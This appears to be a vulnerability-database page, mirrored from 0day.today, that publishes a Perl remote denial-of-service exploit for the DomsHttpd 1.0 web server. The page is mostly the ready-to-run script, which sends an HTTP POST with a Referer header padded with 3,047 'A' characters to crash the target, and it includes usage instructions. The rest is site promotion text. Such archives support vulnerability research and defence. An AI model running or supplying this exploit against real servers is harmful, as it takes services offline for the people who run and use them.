Lucene search
K

DomsHttpd 1.0 <= Remote Denial Of Service Exploit

🗓️ 16 Jul 2012 00:00:00Reported by Jean Pascal PereiraType 
zdt
 zdt
🔗 0day.today👁 22 Views

Remote Denial Of Service exploit for DomsHttpd 1.

Code
#!/usr/bin/perl
 
# DomsHttpd 1.0 <= Remote Denial Of Service Exploit
 
# Credit: Jean Pascal Pereira <[email protected]>
 
# Usage: domshttpd.pl [host] [port]
 
use strict;
use warnings;
use IO::Socket;
 
my $host = shift || "localhost";
my $port = shift || 88;
 
my $sock = IO::Socket::INET->new( Proto => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => $port
);
 
 
my $junk = "A"x3047;
 
print $sock "POST / HTTP/1.1\r\nHost: ".$host."\r\nConnection: close\r\nUser-Agent: Mozilla\r\nReferer: http://".$host."/".$junk."\r\n\r\n";
 
sleep 4;
 
close($sock);



#  0day.today [2018-01-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jul 2012 00:00Current
7High risk
Vulners AI Score7
22